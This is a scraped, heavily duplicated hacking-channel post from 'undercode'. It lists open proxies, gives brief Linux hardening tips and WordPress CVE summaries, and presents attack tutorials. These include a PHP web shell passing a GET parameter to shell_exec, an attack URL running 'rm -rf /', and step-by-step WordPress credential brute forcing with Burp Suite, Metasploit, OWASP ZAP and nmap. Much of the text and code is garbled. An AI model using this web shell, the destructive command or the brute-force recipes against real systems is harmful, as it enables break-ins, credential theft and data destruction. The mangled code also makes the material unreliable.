β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PREMIUM PROXIES CHECKED BY UNDERCODERS :
118.69.50.154:80 anonymous Apr-19, 16:01 Vietnam Ho Chi Minh City FPT Telecom
203.19.92.3:80 anonymous Apr-19, 15:37 Australia Kahibah Tomago Aluminiu...
203.19.88.59:80 anonymous Apr-19, 01:01 Australia Kahibah Tomago Aluminiu...
37.120.192.154:8080 anonymous Apr-19, 02:13 Netherlands Amsterdam Secure Data Sys...
51.158.98.121:8811 anonymous Apr-19, 20:50 France Paris Department for ...
51.158.123.250:8811 anonymous Apr-18, 23:02 France Paris Department for ...
165.255.73.128:53281 elite Apr-19, 06:26 South Africa Johannesburg Axxess Networks
103.83.116.3:55443 elite Apr-19, 20:06 Indonesia
91.230.44.133:3128 elite Apr-19, 13:12 Slovakia Bratislava ASITPRO
202.147.207.253:38646 elite Apr-18, 22:09 Indonesia Jakarta MNC Playmedia
94.229.32.85:3128 elite Apr-19, 04:10 Slovakia Dunajska Luzna DataNetworks s....
158.255.249.58:38914 elite Apr-19, 19:15 Slovakia PreΕ‘ov PRESNET s.r.o.
41.79.197.150:8080 elite Apr-18, 21:40 Somalia Merca Somcable
188.156.240.240:8118 elite Apr-19, 15:08 Hungary Szeged Magyar Telekom
102.164.214.225:55034 elite Apr-19, 15:49 South Africa Leslie
185.63.46.205:57100 elite Apr-19, 00:34 Hungary Hodmezovasarhely MVM Partner Ene...
85.159.48.170:40014 elite Apr-19, 09:31 Hungary Com.unique Tele...
94.21.118.140:48322 elite Apr-19, 07:11 Hungary Paszto DIGI Tavkozlesi...
91.82.49.138:57560 elite Apr-19, 13:17 Hungary Apostag Invitel Tavkozl...
102.164.202.80:34934 elite Apr-19, 09:10 South Africa Volksrust
78.41.174.196:8081 elite Apr-19, 07:11 Slovakia Horny Bar RadioLAN
36.55.230.146:8888 elite Apr-19, 00:19 Japan Kanazawa FreeBit Co.,Ltd.
126.29.117.191:80 elite Apr-19, 01:06 Japan Iwata Softbank BB Corp
61.118.35.94:55725 elite Apr-19, 19:07 Japan Tokyo NTT
124.219.176.139:39589 elite Apr-19, 19:12 Japan Chiba Sony Network Co...
74.116.59.8:53281 elite Apr-19, 15:30 Jamaica Island Networks
81.174.11.159:31194 elite Apr-18, 22:09 Italy NGI SpA
185.25.206.192:8080 elite Apr-19, 16:01 Italy Servereasy di G...
147.91.111.133:37979 elite Apr-19, 01:09 Serbia Akademska mreza...
212.43.123.18:41258 elite Apr-19, 01:11 Italy Basciano Quipo
192.117.146.110:80 elite Apr-19, 00:55 Israel Haifa 012 Smile
82.166.105.66:44081 elite Apr-19, 07:24 Israel Gannot 013 NetVision
52.31.193.74:8118 elite Apr-19, 07:02 Ireland Dublin Amazon Technolo...
185.138.123.78:55337 elite Apr-19, 19:24 Iraq Horizon Scope M...
5.160.240.201:53281 elite Apr-19, 06:11 Iran, Islamic Republic of Respina Network...
91.106.86.212:8080 elite Apr-18, 22:09 Iran, Islamic Republic of PJSC Badr Rayan...
94.229.32.86:3128 elite Apr-19, 07:03 Slovakia Dunajska Luzna DataNetworks s....
159.138.1.185:80 elite Apr-19, 09:22 Singapore Rouge Steel Co.
47.90.54.45:8080 elite Apr-19, 12:30 Hong Kong Alibaba
58.153.226.151:8080 elite Apr-19, 09:29 Hong Kong Kowloon Netvigator
84.75.4.177:80 elite Apr-19, 19:06 Switzerland Lenzburg upc cablecom GmbH
41.139.9.47:8080 elite Apr-19, 19:06 Ghana Accra Teledata ICT Ltd
94.130.179.24:8017 elite Apr-19, 18:39 Germany Gera D2 Internationa...
178.63.246.83:8118 elite Apr-19, 13:03 Germany Hetzner Online ...
94.130.179.24:8010 elite Apr-19, 00:54 Germany Gera D2 Internationa...
94.130.179.24:8026 elite Apr-19, 12:53 Germany Gera D2 Internationa...
94.130.179.24:8047 elite Apr-19, 06:43 Germany Gera D2 Internationa...
106.104.151.142:58198 elite Apr-18, 21:32 Taiwan Taipei New Century Inf...
178.134.155.82:48146 elite Apr-19, 00:35 Georgia Tbilisi JSC Silknet
212.72.159.22:30323 elite Apr-18, 22:08 Georgia Tbilisi Caucasus Online...
122.116.1.83:38680 elite Apr-19, 20:05 Taiwan Taoyuan District HiNet
188.169.123.54:8080 elite Apr-19, 04:05 Georgia Tbilisi JSC Silknet
37.187.4.81:8118 elite Apr-19, 06:17 France OVH SAS
π¦PREMIUM PROXIES CHECKED BY UNDERCODERS :
118.69.50.154:80 anonymous Apr-19, 16:01 Vietnam Ho Chi Minh City FPT Telecom
203.19.92.3:80 anonymous Apr-19, 15:37 Australia Kahibah Tomago Aluminiu...
203.19.88.59:80 anonymous Apr-19, 01:01 Australia Kahibah Tomago Aluminiu...
37.120.192.154:8080 anonymous Apr-19, 02:13 Netherlands Amsterdam Secure Data Sys...
51.158.98.121:8811 anonymous Apr-19, 20:50 France Paris Department for ...
51.158.123.250:8811 anonymous Apr-18, 23:02 France Paris Department for ...
165.255.73.128:53281 elite Apr-19, 06:26 South Africa Johannesburg Axxess Networks
103.83.116.3:55443 elite Apr-19, 20:06 Indonesia
91.230.44.133:3128 elite Apr-19, 13:12 Slovakia Bratislava ASITPRO
202.147.207.253:38646 elite Apr-18, 22:09 Indonesia Jakarta MNC Playmedia
94.229.32.85:3128 elite Apr-19, 04:10 Slovakia Dunajska Luzna DataNetworks s....
158.255.249.58:38914 elite Apr-19, 19:15 Slovakia PreΕ‘ov PRESNET s.r.o.
41.79.197.150:8080 elite Apr-18, 21:40 Somalia Merca Somcable
188.156.240.240:8118 elite Apr-19, 15:08 Hungary Szeged Magyar Telekom
102.164.214.225:55034 elite Apr-19, 15:49 South Africa Leslie
185.63.46.205:57100 elite Apr-19, 00:34 Hungary Hodmezovasarhely MVM Partner Ene...
85.159.48.170:40014 elite Apr-19, 09:31 Hungary Com.unique Tele...
94.21.118.140:48322 elite Apr-19, 07:11 Hungary Paszto DIGI Tavkozlesi...
91.82.49.138:57560 elite Apr-19, 13:17 Hungary Apostag Invitel Tavkozl...
102.164.202.80:34934 elite Apr-19, 09:10 South Africa Volksrust
78.41.174.196:8081 elite Apr-19, 07:11 Slovakia Horny Bar RadioLAN
36.55.230.146:8888 elite Apr-19, 00:19 Japan Kanazawa FreeBit Co.,Ltd.
126.29.117.191:80 elite Apr-19, 01:06 Japan Iwata Softbank BB Corp
61.118.35.94:55725 elite Apr-19, 19:07 Japan Tokyo NTT
124.219.176.139:39589 elite Apr-19, 19:12 Japan Chiba Sony Network Co...
74.116.59.8:53281 elite Apr-19, 15:30 Jamaica Island Networks
81.174.11.159:31194 elite Apr-18, 22:09 Italy NGI SpA
185.25.206.192:8080 elite Apr-19, 16:01 Italy Servereasy di G...
147.91.111.133:37979 elite Apr-19, 01:09 Serbia Akademska mreza...
212.43.123.18:41258 elite Apr-19, 01:11 Italy Basciano Quipo
192.117.146.110:80 elite Apr-19, 00:55 Israel Haifa 012 Smile
82.166.105.66:44081 elite Apr-19, 07:24 Israel Gannot 013 NetVision
52.31.193.74:8118 elite Apr-19, 07:02 Ireland Dublin Amazon Technolo...
185.138.123.78:55337 elite Apr-19, 19:24 Iraq Horizon Scope M...
5.160.240.201:53281 elite Apr-19, 06:11 Iran, Islamic Republic of Respina Network...
91.106.86.212:8080 elite Apr-18, 22:09 Iran, Islamic Republic of PJSC Badr Rayan...
94.229.32.86:3128 elite Apr-19, 07:03 Slovakia Dunajska Luzna DataNetworks s....
159.138.1.185:80 elite Apr-19, 09:22 Singapore Rouge Steel Co.
47.90.54.45:8080 elite Apr-19, 12:30 Hong Kong Alibaba
58.153.226.151:8080 elite Apr-19, 09:29 Hong Kong Kowloon Netvigator
84.75.4.177:80 elite Apr-19, 19:06 Switzerland Lenzburg upc cablecom GmbH
41.139.9.47:8080 elite Apr-19, 19:06 Ghana Accra Teledata ICT Ltd
94.130.179.24:8017 elite Apr-19, 18:39 Germany Gera D2 Internationa...
178.63.246.83:8118 elite Apr-19, 13:03 Germany Hetzner Online ...
94.130.179.24:8010 elite Apr-19, 00:54 Germany Gera D2 Internationa...
94.130.179.24:8026 elite Apr-19, 12:53 Germany Gera D2 Internationa...
94.130.179.24:8047 elite Apr-19, 06:43 Germany Gera D2 Internationa...
106.104.151.142:58198 elite Apr-18, 21:32 Taiwan Taipei New Century Inf...
178.134.155.82:48146 elite Apr-19, 00:35 Georgia Tbilisi JSC Silknet
212.72.159.22:30323 elite Apr-18, 22:08 Georgia Tbilisi Caucasus Online...
122.116.1.83:38680 elite Apr-19, 20:05 Taiwan Taoyuan District HiNet
188.169.123.54:8080 elite Apr-19, 04:05 Georgia Tbilisi JSC Silknet
37.187.4.81:8118 elite Apr-19, 06:17 France OVH SAS
163.172.135.104:80 elite Apr-19, 15:39 United Kingdom Scaleway
188.165.141.114:3129 elite Apr-19, 04:07 France OVH SAS
79.129.117.118:32281 elite Apr-19, 00:15 Greece Nemea OTEnet S.A.
46.246.26.98:8118 elite Apr-19, 09:37 Sweden Portlane Ab
47.52.231.140:8080 elite Apr-19, 10:20 Hong Kong Alibaba
203.218.82.127:8080 elite Apr-19, 01:12 Hong Kong Central Netvigator
159.138.3.119:80 elite Apr-19, 13:16 Singapore Rouge Steel Co.
213.98.67.40:41005 elite Apr-18, 22:22 Spain Mijas Telefonica de E...
190.6.200.158:38256 elite Apr-19, 00:03 Honduras San Pedro Sula Sulanet SA / In...
213.96.26.70:46860 elite Apr-19, 09:09 Spain L'Hospitalet de Llobregat Telefonica de E...
109.167.113.9:51857 elite Apr-19, 04:22 Spain Adamuz ServiHosting Ne...
46.246.42.60:8118 elite Apr-19, 10:10 Sweden Portlane Ab
81.236.13.23:32500 elite Apr-19, 12:56 Sweden Γngelholm TeliaSonera AB
π¦ CHecked as fast proxies by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
188.165.141.114:3129 elite Apr-19, 04:07 France OVH SAS
79.129.117.118:32281 elite Apr-19, 00:15 Greece Nemea OTEnet S.A.
46.246.26.98:8118 elite Apr-19, 09:37 Sweden Portlane Ab
47.52.231.140:8080 elite Apr-19, 10:20 Hong Kong Alibaba
203.218.82.127:8080 elite Apr-19, 01:12 Hong Kong Central Netvigator
159.138.3.119:80 elite Apr-19, 13:16 Singapore Rouge Steel Co.
213.98.67.40:41005 elite Apr-18, 22:22 Spain Mijas Telefonica de E...
190.6.200.158:38256 elite Apr-19, 00:03 Honduras San Pedro Sula Sulanet SA / In...
213.96.26.70:46860 elite Apr-19, 09:09 Spain L'Hospitalet de Llobregat Telefonica de E...
109.167.113.9:51857 elite Apr-19, 04:22 Spain Adamuz ServiHosting Ne...
46.246.42.60:8118 elite Apr-19, 10:10 Sweden Portlane Ab
81.236.13.23:32500 elite Apr-19, 12:56 Sweden Γngelholm TeliaSonera AB
π¦ CHecked as fast proxies by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦small tip :How to prevent Linux hackers from attacking
Linux Hacking takes advantage of vulnerabilities in the operating system. Organizations can adopt the following strategies to protect themselves from such attacks.
1) Patch management -Patches fix bugs that attackers use to damage the system. A good patch management strategy will ensure that you continue to apply relevant patches to your system.
2)Appropriate operating system configuration -Other vulnerabilities ex ploit the weakness of server configuration. Inactive user names and daemons should be disabled. The default settings should be changed, such as common passwords for applications, default user names, and certain port numbers.
3) Intrusion detection system -This type of tool can be used to detect unauthorized access to the system. Some tools can detect and prevent such attacks.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦small tip :How to prevent Linux hackers from attacking
Linux Hacking takes advantage of vulnerabilities in the operating system. Organizations can adopt the following strategies to protect themselves from such attacks.
1) Patch management -Patches fix bugs that attackers use to damage the system. A good patch management strategy will ensure that you continue to apply relevant patches to your system.
2)Appropriate operating system configuration -Other vulnerabilities ex ploit the weakness of server configuration. Inactive user names and daemons should be disabled. The default settings should be changed, such as common passwords for applications, default user names, and certain port numbers.
3) Intrusion detection system -This type of tool can be used to detect unauthorized access to the system. Some tools can detect and prevent such attacks.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Using PHP to crack Ubuntu Linux system :
In this actual scenario, we will provide you with basic information on how to use PHP to destroy Linux. We will not target any victims. If you want to give it a try, you can install LAMPP on your local computer.
PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of the command output, and shell_exec () returns the entire result of the command as a string.
> For demonstration purposes, let us assume that the attacker administrator uploads the following files on the web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here the above script gets the command from the GET variable named cmd. The command is executed using shell_exec () and returns the result in the browser. You can use the above code to use the following URL HTTP: //localhost/cp/konsole.php CMD = LS% 20 liters here,
"... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
π¦ The command executed on the server will be
shell_exec ('ls -l');
executing the above code on the web server will produce results similar to the following :
π¦Using PHP to crack Ubuntu Linux system :
In this actual scenario, we will provide you with basic information on how to use PHP to destroy Linux. We will not target any victims. If you want to give it a try, you can install LAMPP on your local computer.
PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of the command output, and shell_exec () returns the entire result of the command as a string.
> For demonstration purposes, let us assume that the attacker administrator uploads the following files on the web server.
<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here the above script gets the command from the GET variable named cmd. The command is executed using shell_exec () and returns the result in the browser. You can use the above code to use the following URL HTTP: //localhost/cp/konsole.php CMD = LS% 20 liters here,
"... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
π¦ The command executed on the server will be
shell_exec ('ls -l');
executing the above code on the web server will produce results similar to the following :
π¦The above command only displays the files and permissions in the current directory.
Suppose the attacker uses the following command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
Suppose the attacker uses the following command
rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Burp Suite violent attacks for wordpress :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) make Burp Suite work properly, first of all, we need to open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ).
2) Then select the advanced (advanced) option, go further to the network ( Network ), and then select the settings ( settings ) .
Description: Practical penetration tool: 5 ways to use Burpsuite to brute force WordPress
3) Now, choose Manual Proxy Configuration ( Manual Proxy the Configuration ) Type your local host address in the HTTP Proxy tab, and the port is set to 8080. Click OK
4) Now open WordPress on your computer and it will ask for your username and password. Here, start the burp suite before giving the username and password and select the Proxy tab and turn on interception by clicking the Interception on on / off button.
5) When you turn on interception, then type in any password predicted so that the burp suite can capture it. Look at the image. Please note that the last line to get the data shows that I tried to log in as the username and password by type admin: admin .
6) Space by right-clicking and select Send to Intruder option or just press ctrl + i captured material sent to the intruder ( Send to Intruder )
7) Now open Intruder tab, then select the Positions tab without disturbing data click on the right side of the frame clear button ( the Clear the Button ) .
8) now click the right side of the frame Add button ( the Add the Button ) . This configures where to insert the payload into the basic request.
9) Select the attack type to determine how to distribute the payload to the payload location. I will choose a cluster bomb ( cluster bomb ), because the number of payload sets depends on the type of attack, we have 2 payload locations. Click to start attacking ( Start Attack ).
10) Click payload set ( payload SET ) , the two numbers 1 and 2 show, for the first payload position of the number 1 . Click the further payload option ( payload the Option ) in the load button , and configure the payload as a simple list of strings, or only add any path name of the user dictionary.
> Similarly, select the number 2 for another payload location and add any password-only dictionary path. Click to start attacking ( Start Attack ) . Now the brute force attack will match the combination of the two payloads and try to log in with a username and password. When the attack is over, you will obtain certain credentials by checking the status and length , which will be different from other combinations. From the result user: bitnami is the username and password respectively .
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Burp Suite violent attacks for wordpress :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) make Burp Suite work properly, first of all, we need to open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ).
2) Then select the advanced (advanced) option, go further to the network ( Network ), and then select the settings ( settings ) .
Description: Practical penetration tool: 5 ways to use Burpsuite to brute force WordPress
3) Now, choose Manual Proxy Configuration ( Manual Proxy the Configuration ) Type your local host address in the HTTP Proxy tab, and the port is set to 8080. Click OK
4) Now open WordPress on your computer and it will ask for your username and password. Here, start the burp suite before giving the username and password and select the Proxy tab and turn on interception by clicking the Interception on on / off button.
5) When you turn on interception, then type in any password predicted so that the burp suite can capture it. Look at the image. Please note that the last line to get the data shows that I tried to log in as the username and password by type admin: admin .
6) Space by right-clicking and select Send to Intruder option or just press ctrl + i captured material sent to the intruder ( Send to Intruder )
7) Now open Intruder tab, then select the Positions tab without disturbing data click on the right side of the frame clear button ( the Clear the Button ) .
8) now click the right side of the frame Add button ( the Add the Button ) . This configures where to insert the payload into the basic request.
9) Select the attack type to determine how to distribute the payload to the payload location. I will choose a cluster bomb ( cluster bomb ), because the number of payload sets depends on the type of attack, we have 2 payload locations. Click to start attacking ( Start Attack ).
10) Click payload set ( payload SET ) , the two numbers 1 and 2 show, for the first payload position of the number 1 . Click the further payload option ( payload the Option ) in the load button , and configure the payload as a simple list of strings, or only add any path name of the user dictionary.
> Similarly, select the number 2 for another payload location and add any password-only dictionary path. Click to start attacking ( Start Attack ) . Now the brute force attack will match the combination of the two payloads and try to log in with a username and password. When the attack is over, you will obtain certain credentials by checking the status and length , which will be different from other combinations. From the result user: bitnami is the username and password respectively .
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Use metasploit for brute force wordpress attacks :
1) This module will test a series of WordPress logins on computers and report successful logins. If you have loaded the database plugin and connected to the database of this module, it will record successful logins and hosts so that you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
2) Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successfully logged in the user
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Use metasploit for brute force wordpress attacks :
1) This module will test a series of WordPress logins on computers and report successful logins. If you have loaded the database plugin and connected to the database of this module, it will record successful logins and hosts so that you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/
2) Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successfully logged in the user
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hack wordpress number 3:
> Use OWASP ZAP for brute force attacks
1) Zap is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Now we will use this tool for brute force attacks, the entire process is the same as the burp suite.
2) Start OWASP ZAP and open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ). Then select the advanced ( advanced ) option, go further to the network ( Network ), and then select the settings ( Settings ) .
3) Select Manual proxy configuration . Type your local host address ( localhost address ) in the HTTP proxy tab and set the port to 8080. Click OK. Now open WordPress in your computer again, it will predict the username and password .
>It will capture the data,
> You can see it in the "Request" section of the tool and select the characters you entered on the page before, only select the password from the extracted data, and then use the right-click to make the blur option
4) When you click fuzzy, new window " blur filter ( Fuzzer )" will open, now you must click on the left side of the frame Add button ( the Add the Button ) , will open a new window to add a payload ( the Add payload . ) . Click select ( selec t ) and select your dictionary to attack. Click the " Add Add" button again , and then click " Start fuz zer
5) After starting the fuzz test again, a new screen will open, click the option button and click the first radio button to show the payload replacement strategy in depth . Select the concern redirection ( the Follow redirects ) check box, and then click start fuzzing ( Start Fuzzing ).
6) When the attack is over, you will by checking the state ( State ) and the size of the response headers ( size Response header ) obtaining a determined certificate, which will be different from the rest of the combinations.
From the result bitnami is the password of the logged in user .
π¦another WordPress attack :
> Brute force attack using Nmap
This script uses unpwdb and brute library to perform password guessing. Use the vault to store any successful guesses.
Follow the Nmap command to open the Kali terminal type
nmapβsV-scripthttp-wordpress-brute-script-args' userdb = / root / Desktop / login.txt, passdb = / root / Desktop / pass.txt, http-wordpress- brute.hostname = domain.com, http-wordpress-brute.thread = 3, brute.firstonly = true '192.168.1.17
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hack wordpress number 3:
> Use OWASP ZAP for brute force attacks
1) Zap is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Now we will use this tool for brute force attacks, the entire process is the same as the burp suite.
2) Start OWASP ZAP and open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ). Then select the advanced ( advanced ) option, go further to the network ( Network ), and then select the settings ( Settings ) .
3) Select Manual proxy configuration . Type your local host address ( localhost address ) in the HTTP proxy tab and set the port to 8080. Click OK. Now open WordPress in your computer again, it will predict the username and password .
>It will capture the data,
> You can see it in the "Request" section of the tool and select the characters you entered on the page before, only select the password from the extracted data, and then use the right-click to make the blur option
4) When you click fuzzy, new window " blur filter ( Fuzzer )" will open, now you must click on the left side of the frame Add button ( the Add the Button ) , will open a new window to add a payload ( the Add payload . ) . Click select ( selec t ) and select your dictionary to attack. Click the " Add Add" button again , and then click " Start fuz zer
5) After starting the fuzz test again, a new screen will open, click the option button and click the first radio button to show the payload replacement strategy in depth . Select the concern redirection ( the Follow redirects ) check box, and then click start fuzzing ( Start Fuzzing ).
6) When the attack is over, you will by checking the state ( State ) and the size of the response headers ( size Response header ) obtaining a determined certificate, which will be different from the rest of the combinations.
From the result bitnami is the password of the logged in user .
π¦another WordPress attack :
> Brute force attack using Nmap
This script uses unpwdb and brute library to perform password guessing. Use the vault to store any successful guesses.
Follow the Nmap command to open the Kali terminal type
nmapβsV-scripthttp-wordpress-brute-script-args' userdb = / root / Desktop / login.txt, passdb = / root / Desktop / pass.txt, http-wordpress- brute.hostname = domain.com, http-wordpress-brute.thread = 3, brute.firstonly = true '192.168.1.17
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
12) CVE-2018-20153 79 XSS 2018-12-14 2019-01-04 3.5 None Remote Medium Single system None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could modify new comments made by users with greater privileges, possibly causing XSS.
13 CVE-2018-20152 20 Bypass 2018-12-14 2019-01-04 5.0 None Remote Low Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could bypass intended restrictions on post types via crafted input.
14) CVE-2018-20151 200 +Info 2018-12-14 2019-01-04 5.0 None Remote Low Not required Partial None None
In WordPress before 4.9.9 and 5.x before 5.0.1, the user-activation page could be read by a search engine's web crawler if an unusual configuration were chosen. The search engine could then index and display a user's e-mail address and (rarely) the password that was generated by default.
15) CVE-2018-20150 79 XSS 2018-12-14 2019-01-04 4.3 None Remote Medium Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, crafted URLs could trigger XSS for certain use cases involving plugins.
16) CVE-2018-20149 79 XSS Bypass 2018-12-14 2019-01-04 3.5 None Remote Medium Single system None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, when the Apache HTTP Server is used, authors could upload crafted files that bypass intended MIME type restrictions, leading to XSS, as demonstrated by a .jpg file without JPEG data.
17) CVE-2018-20148 502 2018-12-14 2019-01-04 7.5 None Remote Low Not required Partial Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php.
18) CVE-2018-20147 287 Bypass 2018-12-14 2019-10-02 5.5 None Remote Low Single system None Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could modify metadata to bypass intended restrictions on deleting files.
19) CVE-2018-14028 434 Exec Code 2018-08-10 2018-10-10 6.5 None Remote Low Single system Partial Partial Partial
In WordPress 4.9.7, plugins uploaded via the admin area are not verified as being ZIP files. This allows for PHP files to be uploaded. Once a PHP file is uploaded, the plugin extraction fails, but the PHP file remains in a predictable wp-content/uploads location, allowing for an attacker to then execute the file. This represents a security risk in limited scenarios where an attacker (who does have the required capabilities for plugin uploads) cannot simply place arbitrary PHP code into a valid plugin ZIP file and upload that plugin, because a machine's wp-content/plugins directory permissions were set up to block all new plugins.
20) CVE-2018-12895 22 Exec Code Dir. Trav. 2018-06-26 2018-08-20 6.5 None Remote Low Single system Partial Partial Partial
WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges.
21) CVE-2018-10102 79 XSS 2018-04-16 2018-05-18 4.3 None Remote Medium Not required None Partial None
Before WordPress 4.9.5, the version string was not escaped in the get_the_generator function, and could lead to XSS in a generator tag.
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could modify new comments made by users with greater privileges, possibly causing XSS.
13 CVE-2018-20152 20 Bypass 2018-12-14 2019-01-04 5.0 None Remote Low Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could bypass intended restrictions on post types via crafted input.
14) CVE-2018-20151 200 +Info 2018-12-14 2019-01-04 5.0 None Remote Low Not required Partial None None
In WordPress before 4.9.9 and 5.x before 5.0.1, the user-activation page could be read by a search engine's web crawler if an unusual configuration were chosen. The search engine could then index and display a user's e-mail address and (rarely) the password that was generated by default.
15) CVE-2018-20150 79 XSS 2018-12-14 2019-01-04 4.3 None Remote Medium Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, crafted URLs could trigger XSS for certain use cases involving plugins.
16) CVE-2018-20149 79 XSS Bypass 2018-12-14 2019-01-04 3.5 None Remote Medium Single system None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, when the Apache HTTP Server is used, authors could upload crafted files that bypass intended MIME type restrictions, leading to XSS, as demonstrated by a .jpg file without JPEG data.
17) CVE-2018-20148 502 2018-12-14 2019-01-04 7.5 None Remote Low Not required Partial Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php.
18) CVE-2018-20147 287 Bypass 2018-12-14 2019-10-02 5.5 None Remote Low Single system None Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could modify metadata to bypass intended restrictions on deleting files.
19) CVE-2018-14028 434 Exec Code 2018-08-10 2018-10-10 6.5 None Remote Low Single system Partial Partial Partial
In WordPress 4.9.7, plugins uploaded via the admin area are not verified as being ZIP files. This allows for PHP files to be uploaded. Once a PHP file is uploaded, the plugin extraction fails, but the PHP file remains in a predictable wp-content/uploads location, allowing for an attacker to then execute the file. This represents a security risk in limited scenarios where an attacker (who does have the required capabilities for plugin uploads) cannot simply place arbitrary PHP code into a valid plugin ZIP file and upload that plugin, because a machine's wp-content/plugins directory permissions were set up to block all new plugins.
20) CVE-2018-12895 22 Exec Code Dir. Trav. 2018-06-26 2018-08-20 6.5 None Remote Low Single system Partial Partial Partial
WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges.
21) CVE-2018-10102 79 XSS 2018-04-16 2018-05-18 4.3 None Remote Medium Not required None Partial None
Before WordPress 4.9.5, the version string was not escaped in the get_the_generator function, and could lead to XSS in a generator tag.
22) CVE-2018-10101 601 2018-04-16 2018-06-02 5.8 None Remote Medium Not required Partial Partial None
Before WordPress 4.9.5, the URL validator assumed URLs with the hostname localhost were on the same host as the WordPress server.
23) CVE-2018-10100 601 2018-04-16 2018-05-18 5.8 None Remote Medium Not required Partial Partial None
Before WordPress 4.9.5, the redirection URL for the login page was not validated or sanitized if forced to use HTTPS.
24) CVE-2018-6389 399 DoS 2018-02-06 2018-03-05 5.0 None Remote Low Not required None None Partial
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
25) CVE-2018-5776 79 XSS 2018-01-18 2018-02-01 4.3 None Remote Medium Not required None Partial None
WordPress before 4.9.2 has XSS in the Flash fallback files in MediaElement (under wp-includes/js/mediaelement).
